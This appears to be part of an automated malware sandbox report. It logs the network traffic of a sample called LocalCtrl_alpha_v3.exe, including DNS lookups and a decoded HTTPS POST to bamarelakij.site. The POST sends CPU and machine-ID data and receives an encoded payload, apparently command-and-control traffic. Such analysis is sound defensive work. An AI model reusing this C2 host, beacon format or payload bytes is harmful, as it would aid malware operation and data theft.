                                                                                                                                                            Jan 6, 2025 23:05:09.364599943 CET44352088162.159.61.3192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:09.364846945 CET44352088162.159.61.3192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:09.364865065 CET52088443192.168.2.4162.159.61.3
                                                                                                                                                            Jan 6, 2025 23:05:09.366637945 CET44352088162.159.61.3192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:09.366956949 CET52088443192.168.2.4162.159.61.3
                                                                                                                                                            Jan 6, 2025 23:05:09.368205070 CET52088443192.168.2.4162.159.61.3
                                                                                                                                                            Jan 6, 2025 23:05:09.368527889 CET52088443192.168.2.4162.159.61.3
                                                                                                                                                            Jan 6, 2025 23:05:09.428426027 CET44352088162.159.61.3192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:09.428669930 CET44352088162.159.61.3192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:09.428687096 CET44352088162.159.61.3192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:09.428874016 CET52088443192.168.2.4162.159.61.3
                                                                                                                                                            Jan 6, 2025 23:05:09.465244055 CET44352088162.159.61.3192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:09.465857029 CET44352088162.159.61.3192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:09.466245890 CET44352088162.159.61.3192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:09.466836929 CET44352088162.159.61.3192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:09.467108965 CET52088443192.168.2.4162.159.61.3
                                                                                                                                                            Jan 6, 2025 23:05:09.994463921 CET52088443192.168.2.4162.159.61.3
                                                                                                                                                            Jan 6, 2025 23:05:09.994682074 CET52088443192.168.2.4162.159.61.3
                                                                                                                                                            Jan 6, 2025 23:05:10.090959072 CET44352088162.159.61.3192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:10.091923952 CET44352088162.159.61.3192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:10.091969013 CET44352088162.159.61.3192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:10.092855930 CET52088443192.168.2.4162.159.61.3
                                                                                                                                                            Jan 6, 2025 23:05:21.185084105 CET52088443192.168.2.4162.159.61.3
                                                                                                                                                            Jan 6, 2025 23:05:21.185250044 CET52088443192.168.2.4162.159.61.3
                                                                                                                                                            Jan 6, 2025 23:05:21.282197952 CET44352088162.159.61.3192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:21.285022020 CET44352088162.159.61.3192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:21.289813995 CET44352088162.159.61.3192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:21.290045023 CET52088443192.168.2.4162.159.61.3
                                                                                                                                                            Jan 6, 2025 23:05:22.164568901 CET52088443192.168.2.4162.159.61.3
                                                                                                                                                            Jan 6, 2025 23:05:22.164889097 CET52088443192.168.2.4162.159.61.3
                                                                                                                                                            Jan 6, 2025 23:05:22.165781975 CET54292443192.168.2.4172.64.41.3
                                                                                                                                                            Jan 6, 2025 23:05:22.166256905 CET54292443192.168.2.4172.64.41.3
                                                                                                                                                            Jan 6, 2025 23:05:22.261492014 CET44352088162.159.61.3192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:22.262938023 CET44352088162.159.61.3192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:22.263339996 CET44352088162.159.61.3192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:22.263650894 CET52088443192.168.2.4162.159.61.3
                                                                                                                                                            Jan 6, 2025 23:05:22.265100956 CET44354292172.64.41.3192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:22.266782045 CET44354292172.64.41.3192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:22.267553091 CET44354292172.64.41.3192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:22.267791033 CET54292443192.168.2.4172.64.41.3
                                                                                                                                                            Jan 6, 2025 23:06:03.792830944 CET59699443192.168.2.4162.159.61.3
                                                                                                                                                            Jan 6, 2025 23:06:03.793270111 CET59699443192.168.2.4162.159.61.3
                                                                                                                                                            Jan 6, 2025 23:06:03.793544054 CET59699443192.168.2.4162.159.61.3
                                                                                                                                                            Jan 6, 2025 23:06:03.793965101 CET59699443192.168.2.4162.159.61.3
                                                                                                                                                            Jan 6, 2025 23:06:04.119427919 CET59699443192.168.2.4162.159.61.3
                                                                                                                                                            Jan 6, 2025 23:06:04.243030071 CET44359699162.159.61.3192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:06:04.243089914 CET44359699162.159.61.3192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:06:04.243099928 CET44359699162.159.61.3192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:06:04.243108034 CET44359699162.159.61.3192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:06:04.243115902 CET44359699162.159.61.3192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:06:04.243804932 CET59699443192.168.2.4162.159.61.3
                                                                                                                                                            Jan 6, 2025 23:06:04.243804932 CET59699443192.168.2.4162.159.61.3
                                                                                                                                                            Jan 6, 2025 23:06:04.243870974 CET59699443192.168.2.4162.159.61.3
                                                                                                                                                            Jan 6, 2025 23:06:04.243937016 CET59699443192.168.2.4162.159.61.3
                                                                                                                                                            Jan 6, 2025 23:06:04.337383032 CET44359699162.159.61.3192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:06:04.337800980 CET59699443192.168.2.4162.159.61.3
                                                                                                                                                            Jan 6, 2025 23:06:04.433113098 CET44359699162.159.61.3192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:06:04.434149027 CET44359699162.159.61.3192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:06:04.434508085 CET44359699162.159.61.3192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:06:04.434823990 CET59699443192.168.2.4162.159.61.3

                                                                                                                                                            ICMP Packets

                                                                                                                                                            TimestampSource IPDest IPChecksumCodeType
                                                                                                                                                            Jan 6, 2025 23:05:04.475508928 CET192.168.2.41.1.1.1c2a0(Port unreachable)Destination Unreachable

                                                                                                                                                            DNS Queries

                                                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                            Jan 6, 2025 23:04:46.339977026 CET192.168.2.41.1.1.10x9214Standard query (0)bamarelakij.siteA (IP address)IN (0x0001)false
                                                                                                                                                            Jan 6, 2025 23:05:00.305433989 CET192.168.2.41.1.1.10xe6a0Standard query (0)ntp.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                            Jan 6, 2025 23:05:00.305563927 CET192.168.2.41.1.1.10xe276Standard query (0)ntp.msn.com65IN (0x0001)false
                                                                                                                                                            Jan 6, 2025 23:05:02.096301079 CET192.168.2.41.1.1.10x163bStandard query (0)bzib.nelreports.netA (IP address)IN (0x0001)false
                                                                                                                                                            Jan 6, 2025 23:05:02.096585035 CET192.168.2.41.1.1.10xf735Standard query (0)bzib.nelreports.net65IN (0x0001)false
                                                                                                                                                            Jan 6, 2025 23:05:02.572757006 CET192.168.2.41.1.1.10x80a6Standard query (0)clients2.googleusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                                            Jan 6, 2025 23:05:02.572966099 CET192.168.2.41.1.1.10x29d4Standard query (0)clients2.googleusercontent.com65IN (0x0001)false
                                                                                                                                                            Jan 6, 2025 23:05:03.448410034 CET192.168.2.41.1.1.10xa48Standard query (0)sb.scorecardresearch.comA (IP address)IN (0x0001)false
                                                                                                                                                            Jan 6, 2025 23:05:03.448410034 CET192.168.2.41.1.1.10x60baStandard query (0)sb.scorecardresearch.com65IN (0x0001)false
                                                                                                                                                            Jan 6, 2025 23:05:03.451582909 CET192.168.2.41.1.1.10xcfc8Standard query (0)assets.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                            Jan 6, 2025 23:05:03.451582909 CET192.168.2.41.1.1.10xf564Standard query (0)assets.msn.com65IN (0x0001)false
                                                                                                                                                            Jan 6, 2025 23:05:03.457295895 CET192.168.2.41.1.1.10x5639Standard query (0)c.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                            Jan 6, 2025 23:05:03.457587957 CET192.168.2.41.1.1.10xe93aStandard query (0)c.msn.com65IN (0x0001)false
                                                                                                                                                            Jan 6, 2025 23:05:03.469726086 CET192.168.2.41.1.1.10x71eeStandard query (0)api.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                            Jan 6, 2025 23:05:03.469919920 CET192.168.2.41.1.1.10x63eStandard query (0)api.msn.com65IN (0x0001)false
                                                                                                                                                            Jan 6, 2025 23:05:04.806452990 CET192.168.2.41.1.1.10x8c5eStandard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                            Jan 6, 2025 23:05:04.806797028 CET192.168.2.41.1.1.10x6b8fStandard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                            Jan 6, 2025 23:05:04.807298899 CET192.168.2.41.1.1.10x950eStandard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                            Jan 6, 2025 23:05:04.807593107 CET192.168.2.41.1.1.10xa2b4Standard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                            Jan 6, 2025 23:05:04.902157068 CET192.168.2.41.1.1.10x256aStandard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                            Jan 6, 2025 23:05:04.902343988 CET192.168.2.41.1.1.10x30e9Standard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                            2025-01-06 22:05:06 UTC192.168.2.4162.159.61.30x0Standard query (0)assets.msn.comA (IP address)IN (0x0001)true
                                                                                                                                                            2025-01-06 22:05:06 UTC192.168.2.4162.159.61.30x0Standard query (0)assets.msn.com65IN (0x0001)true

                                                                                                                                                            DNS Answers

                                                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                            Jan 6, 2025 23:04:46.353698969 CET1.1.1.1192.168.2.40x9214No error (0)bamarelakij.site104.21.80.52A (IP address)IN (0x0001)false
                                                                                                                                                            Jan 6, 2025 23:04:46.353698969 CET1.1.1.1192.168.2.40x9214No error (0)bamarelakij.site172.67.174.91A (IP address)IN (0x0001)false
                                                                                                                                                            Jan 6, 2025 23:05:00.297626972 CET1.1.1.1192.168.2.40x17eaNo error (0)svc.ha-teams.office.commira-tmc.tm-4.office.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                            Jan 6, 2025 23:05:00.312211037 CET1.1.1.1192.168.2.40xe6a0No error (0)ntp.msn.comwww-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                            Jan 6, 2025 23:05:00.312520027 CET1.1.1.1192.168.2.40xe276No error (0)ntp.msn.comwww-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                            Jan 6, 2025 23:05:02.103308916 CET1.1.1.1192.168.2.40x163bNo error (0)bzib.nelreports.netbzib.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                            Jan 6, 2025 23:05:02.103784084 CET1.1.1.1192.168.2.40xf735No error (0)bzib.nelreports.netbzib.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                            Jan 6, 2025 23:05:02.579490900 CET1.1.1.1192.168.2.40x80a6No error (0)clients2.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                            Jan 6, 2025 23:05:02.579490900 CET1.1.1.1192.168.2.40x80a6No error (0)googlehosted.l.googleusercontent.com142.250.186.97A (IP address)IN (0x0001)false
                                                                                                                                                            Jan 6, 2025 23:05:02.580117941 CET1.1.1.1192.168.2.40x29d4No error (0)clients2.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                            Jan 6, 2025 23:05:03.455588102 CET1.1.1.1192.168.2.40xa48No error (0)sb.scorecardresearch.com18.244.18.32A (IP address)IN (0x0001)false
                                                                                                                                                            Jan 6, 2025 23:05:03.455588102 CET1.1.1.1192.168.2.40xa48No error (0)sb.scorecardresearch.com18.244.18.27A (IP address)IN (0x0001)false
                                                                                                                                                            Jan 6, 2025 23:05:03.455588102 CET1.1.1.1192.168.2.40xa48No error (0)sb.scorecardresearch.com18.244.18.38A (IP address)IN (0x0001)false
                                                                                                                                                            Jan 6, 2025 23:05:03.455588102 CET1.1.1.1192.168.2.40xa48No error (0)sb.scorecardresearch.com18.244.18.122A (IP address)IN (0x0001)false
                                                                                                                                                            Jan 6, 2025 23:05:03.459222078 CET1.1.1.1192.168.2.40xf564No error (0)assets.msn.comassets.msn.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                            Jan 6, 2025 23:05:03.459436893 CET1.1.1.1192.168.2.40xcfc8No error (0)assets.msn.comassets.msn.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                            Jan 6, 2025 23:05:03.464462042 CET1.1.1.1192.168.2.40x5639No error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                            Jan 6, 2025 23:05:03.464749098 CET1.1.1.1192.168.2.40xe93aNo error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                            Jan 6, 2025 23:05:03.476480961 CET1.1.1.1192.168.2.40x71eeNo error (0)api.msn.comapi-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                            Jan 6, 2025 23:05:03.476809025 CET1.1.1.1192.168.2.40x63eNo error (0)api.msn.comapi-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                            Jan 6, 2025 23:05:04.536864996 CET1.1.1.1192.168.2.40x72d5No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                            Jan 6, 2025 23:05:04.536864996 CET1.1.1.1192.168.2.40x72d5No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                                                                                                            Jan 6, 2025 23:05:04.813246965 CET1.1.1.1192.168.2.40x8c5eNo error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                            Jan 6, 2025 23:05:04.813246965 CET1.1.1.1192.168.2.40x8c5eNo error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                            Jan 6, 2025 23:05:04.813663960 CET1.1.1.1192.168.2.40x6b8fNo error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                            Jan 6, 2025 23:05:04.814146042 CET1.1.1.1192.168.2.40x950eNo error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                            Jan 6, 2025 23:05:04.814146042 CET1.1.1.1192.168.2.40x950eNo error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                            Jan 6, 2025 23:05:04.814157009 CET1.1.1.1192.168.2.40xa2b4No error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                            Jan 6, 2025 23:05:04.909204006 CET1.1.1.1192.168.2.40x30e9No error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                            Jan 6, 2025 23:05:04.909238100 CET1.1.1.1192.168.2.40x256aNo error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                            Jan 6, 2025 23:05:04.909238100 CET1.1.1.1192.168.2.40x256aNo error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                            Jan 6, 2025 23:06:00.480407000 CET1.1.1.1192.168.2.40x8f3No error (0)fg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                                            Jan 6, 2025 23:06:00.480407000 CET1.1.1.1192.168.2.40x8f3No error (0)fg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                            Jan 6, 2025 23:06:01.490478992 CET1.1.1.1192.168.2.40x8f3No error (0)fg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                            Jan 6, 2025 23:06:01.490478992 CET1.1.1.1192.168.2.40x8f3No error (0)fg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                                            Jan 6, 2025 23:06:02.506644964 CET1.1.1.1192.168.2.40x8f3No error (0)fg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                                            Jan 6, 2025 23:06:02.506644964 CET1.1.1.1192.168.2.40x8f3No error (0)fg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                            Jan 6, 2025 23:06:04.524154902 CET1.1.1.1192.168.2.40x8f3No error (0)fg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                            Jan 6, 2025 23:06:04.524154902 CET1.1.1.1192.168.2.40x8f3No error (0)fg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                                            Jan 6, 2025 23:06:08.538023949 CET1.1.1.1192.168.2.40x8f3No error (0)fg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                                            Jan 6, 2025 23:06:08.538023949 CET1.1.1.1192.168.2.40x8f3No error (0)fg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                            2025-01-06 22:05:06 UTC162.159.61.3192.168.2.40x0No error (0)assets.msn.comassets.msn.com.edgekey.netCNAME (Canonical name)IN (0x0001)true
                                                                                                                                                            2025-01-06 22:05:06 UTC162.159.61.3192.168.2.40x0No error (0)assets.msn.comassets.msn.com.edgekey.netCNAME (Canonical name)IN (0x0001)true

                                                                                                                                                            HTTP Request Dependency Graph

                                                                                                                                                            • bamarelakij.site
                                                                                                                                                            • clients2.googleusercontent.com
                                                                                                                                                            • chrome.cloudflare-dns.com
                                                                                                                                                            • https:
                                                                                                                                                              • sb.scorecardresearch.com
                                                                                                                                                              • browser.events.data.msn.com
                                                                                                                                                              • c.msn.com

                                                                                                                                                            HTTPS Proxied Packets

                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            0192.168.2.449739104.21.80.524434176C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2025-01-06 22:04:46 UTC352OUTPOST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Accept: */*
                                                                                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15
                                                                                                                                                            Content-Length: 147
                                                                                                                                                            Host: bamarelakij.site
                                                                                                                                                            2025-01-06 22:04:46 UTC147OUTData Raw: 03 00 00 00 00 00 00 00 00 00 00 00 fd ff ff ff 92 00 00 60 00 00 00 00 00 00 00 00 00 00 00 fe ff ff ff 97 00 a0 d9 26 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a a0 ce 64 88 dc 82 cf 01 d9 f5 d7 9d 1e 13 ec d9 24 39 65 31 34 36 62 65 39 2d 63 37 36 61 2d 34 37 32 30 2d 62 63 64 62 2d 35 33 30 31 31 62 38 37 62 64 30 36 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                                                                                                            Data Ascii: `&Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzd$9e146be9-c76a-4720-bcdb-53011b87bd06
                                                                                                                                                            2025-01-06 22:04:47 UTC845INHTTP/1.1 200 OK
                                                                                                                                                            Date: Mon, 06 Jan 2025 22:04:47 GMT
                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                            Connection: close
                                                                                                                                                            v: UMHdxanm3JkpSS6dDeuXisnY2ivv9pluVBLdEH51K7de7cSuxFBZbVKv7L2rHeFc6D5l/VX9Va+2HXLCaP37YNjz9VjTIQ
                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vIfBE3pia3T2yuCOxbxeC0uxGP2hBIq9zxdMt5XHQDld2YvLnVDHC2rDaFK7gaYjnhkVqH5VPTkXfKRoIv%2BmTF1YS6q7%2Fvm54iRdwpEyh0ylFogmmQrT0RPw9KbhyfnmRZrZ"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                            Server: cloudflare
                                                                                                                                                            CF-RAY: 8fdf01796ac942b5-EWR
                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=12353&min_rtt=1876&rtt_var=7082&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2838&recv_bytes=1135&delivery_rate=1556503&cwnd=218&unsent_bytes=0&cid=812337631cbfe182&ts=478&x=0"
                                                                                                                                                            2025-01-06 22:04:47 UTC524INData Raw: 33 32 66 32 0d 0a f2 82 00 00 00 00 00 00 00 00 00 00 e0 c7 0b 36 0e 00 7f 0e 86 0b 13 00 ec 0e 16 11 02 ec 08 7a 59 86 0b 65 9b b6 a7 b7 51 c9 59 b3 b2 b1 b5 b7 af 31 39 b7 bb b9 b2 39 b9 20 00 96 09 05 0f 13 00 ec 0e 16 11 02 ec 08 3e 59 05 0f 65 9b b6 a7 b7 51 c9 59 a9 a7 23 2a ab a0 29 a2 2e ab a7 ab 1b 1a 99 19 27 b7 32 b2 2e 2b b0 36 3b b2 2e a9 3a b2 b0 b6 04 00 ac 09 ce 02 0f 00 e4 0e 16 11 02 e4 04 34 59 ce 02 bc 58 d8 c3 49 7d 17 f0 0b 00 42 01 a9 05 13 00 ec 0e 16 11 02 ec 08 34 59 a9 05 65 9b b6 a7 b7 51 c9 59 28 39 b2 33 b2 39 b2 37 b1 b2 b9 04 00 c6 03 32 0c 0f 00 e4 0e 16 11 02 e4 04 72 59 32 0c 65 fc e2 b9 9f d9 2d 8a 04 00 24 09 7a 0d 0f 00 e4 0e 16 11 02 e4 04 76 59 7a 0d f9 87 f9 1f 08 a2 36 2c 20 00 da 0c 94 00 13 00 ec 0e 16 11 02 ec
                                                                                                                                                            Data Ascii: 32f26zYeQY199 >YeQY#*).'2.+6;.:4YXI}B4YeQY(93972rY2e-$zvYz6,
                                                                                                                                                            2025-01-06 22:04:47 UTC1369INData Raw: 03 4b 04 13 00 ec 0e 16 11 02 ec 08 7a 59 4b 04 65 9b b6 a7 b7 51 c9 59 b3 b2 b1 b5 b7 af 31 39 b7 bb b9 b2 39 b9 0a 00 1a 02 7b 0c 13 00 ec 0e 16 11 02 ec 08 76 59 7b 0c 65 9b b6 a7 b7 51 c9 59 b6 b9 b2 32 b3 b2 17 b2 3c b2 08 00 8c 06 43 09 13 00 eb 0e 16 11 02 eb 08 34 59 43 09 47 ac ad f0 3d 2b 6a cc b2 32 32 97 01 18 2c 3f 04 00 a5 0a a1 0c 0f 00 e4 0e 16 11 02 e4 04 34 59 a1 0c a0 8a c3 bc 51 af 0c 8f 0e 00 92 02 cd 09 13 00 ec 0e 16 11 02 ec 08 7a 59 cd 09 65 9b b6 a7 b7 51 c9 59 b3 b2 b1 b5 b7 af 31 39 b7 bb b9 b2 39 b9 16 00 89 02 22 06 13 00 ec 0e 16 11 02 ec 08 73 59 22 06 65 9b b6 a7 b7 51 c9 59 2a b2 36 b2 b3 39 b0 b6 10 22 b2 b9 b5 3a b7 38 2e 3a 32 b0 3a b0 08 00 e1 03 08 0a 13 00 eb 0e 16 11 02 eb 08 d8 59 08 0a 01 28 f6 ed 70 e9 f5 15 f1
                                                                                                                                                            Data Ascii: KzYKeQY199{vY{eQY2<C4YCG=+j22,?4YQzYeQY199"sY"eQY*69":8.:2:Y(p
                                                                                                                                                            2025-01-06 22:04:47 UTC1369INData Raw: 59 79 0a 65 9b b6 a7 b7 51 c9 59 aa b9 b2 39 96 a0 b3 b2 37 3a 06 00 83 0e a5 06 13 00 ec 0e 16 11 02 ec 08 72 59 a5 06 65 9b b6 a7 b7 51 c9 59 a0 39 b6 b7 39 bc 0b 00 e9 07 7c 08 13 00 ec 0e 16 11 02 ec 08 76 59 7c 08 65 9b b6 a7 b7 51 c9 59 26 b7 b1 b0 36 10 a9 3a b0 3a b2 07 00 22 0c 52 01 13 00 ec 0e 16 11 02 ec 08 76 59 52 01 65 9b b6 a7 b7 51 c9 59 a1 aa 29 29 a2 27 2a 16 00 c6 07 38 07 13 00 ec 0e 16 11 02 ec 08 9a 59 38 07 65 9b b6 a7 b7 51 c9 59 3b 37 b1 2e 2a b4 b3 34 3a 2b 27 a1 2e 32 b0 3a b0 17 35 b9 b7 37 04 00 2a 06 04 05 0f 00 e4 0e 16 11 02 e4 04 72 59 04 05 5f 60 67 d8 af 45 a8 eb 08 00 c7 02 33 0f 13 00 ec 0e 16 11 02 ec 08 d8 59 33 0f 65 9b b6 a7 b7 51 c9 59 b2 32 b3 b2 17 b2 3c b2 07 00 cc 0e a3 08 13 00 ec 0e 16 11 02 ec 08 76 59 a3
                                                                                                                                                            Data Ascii: YyeQY97:rYeQY99|vY|eQY&6::"RvYReQY))'*8Y8eQY;7.*4:+'.2:57*rY_`gE3Y3eQY2<vY
                                                                                                                                                            2025-01-06 22:04:47 UTC1369INData Raw: 59 ba b9 b2 39 3a b0 b3 08 00 e9 01 f9 0d 13 00 eb 0e 16 11 02 eb 08 9a 59 f9 0d 30 5c 2f b5 da 53 52 ec c1 c2 b0 d2 e6 60 14 1f 0a 00 51 03 3c 08 13 00 ec 0e 16 11 02 ec 08 72 59 3c 08 65 9b b6 a7 b7 51 c9 59 b9 3a 39 22 b0 3a b0 22 b4 39 07 00 63 06 8e 0a 13 00 ec 0e 16 11 02 ec 08 9a 59 8e 0a 65 9b b6 a7 b7 51 c9 59 29 b2 b0 36 2b 27 a1 01 00 90 06 86 0d 13 00 ec 0e 16 11 02 ec 08 72 59 86 0d 65 9b b6 a7 b7 51 c9 59 15 07 00 19 0a 41 00 13 00 ec 0e 16 11 02 ec 08 76 59 41 00 65 9b b6 a7 b7 51 c9 59 a1 aa 29 29 a2 27 2a 15 00 73 0a 4a 03 13 00 ec 0e 16 11 02 ec 08 9a 59 4a 03 65 9b b6 a7 b7 51 c9 59 3b 37 b1 2e 29 b2 b0 36 2b 27 a1 2e 32 b0 3a b0 17 35 b9 b7 37 04 00 a3 0b 90 08 0f 00 e4 0e 16 11 02 e4 04 61 59 90 08 1b e9 48 a8 eb c8 87 9b 04 00 33 06
                                                                                                                                                            Data Ascii: Y9:Y0\/SR`Q<rY<eQY:9":"9cYeQY)6+'rYeQYAvYAeQY))'*sJYJeQY;7.)6+'.2:57aYH3
                                                                                                                                                            2025-01-06 22:04:47 UTC1369INData Raw: bb b2 39 17 32 2e 38 b0 b9 b9 bb b7 39 32 b9 17 32 b2 b1 39 bc 38 3a b2 32 96 b6 b0 b9 3a b2 39 04 00 41 0c cc 04 0f 00 e4 0e 16 11 02 e4 04 d8 59 cc 04 ec 5f 04 4b 73 a8 62 60 07 00 36 00 3f 0f 13 00 ec 0e 16 11 02 ec 08 9a 59 3f 0f 65 9b b6 a7 b7 51 c9 59 38 39 b4 3b b0 3a b2 07 00 96 06 c8 0a 13 00 ec 0e 16 11 02 ec 08 ed 59 c8 0a 65 9b b6 a7 b7 51 c9 59 a0 37 bc 22 b2 b9 b5 04 00 21 09 76 0c 0f 00 e4 0e 16 11 02 e4 04 34 59 76 0c fb 52 3e bf 0a 77 f1 8c 08 00 71 02 11 0c 13 00 ec 0e 16 11 02 ec 08 72 59 11 0c 65 9b b6 a7 b7 51 c9 59 31 36 b5 32 b0 3a b0 15 04 00 61 0a a5 01 0f 00 e4 0e 16 11 02 e4 04 76 59 a5 01 d6 2e 11 d5 27 0b de e6 04 00 92 05 0d 06 0f 00 e4 0e 16 11 02 e4 04 73 59 0d 06 cd 2c 10 df 3d 0d df ec 08 00 09 08 5a 01 13 00 ec 0e 16 11
                                                                                                                                                            Data Ascii: 92.892298:2:9AY_Ksb`6?Y?eQY89;:YeQY7"!v4YvR>wqrYeQY162:avY.'sY,=Z
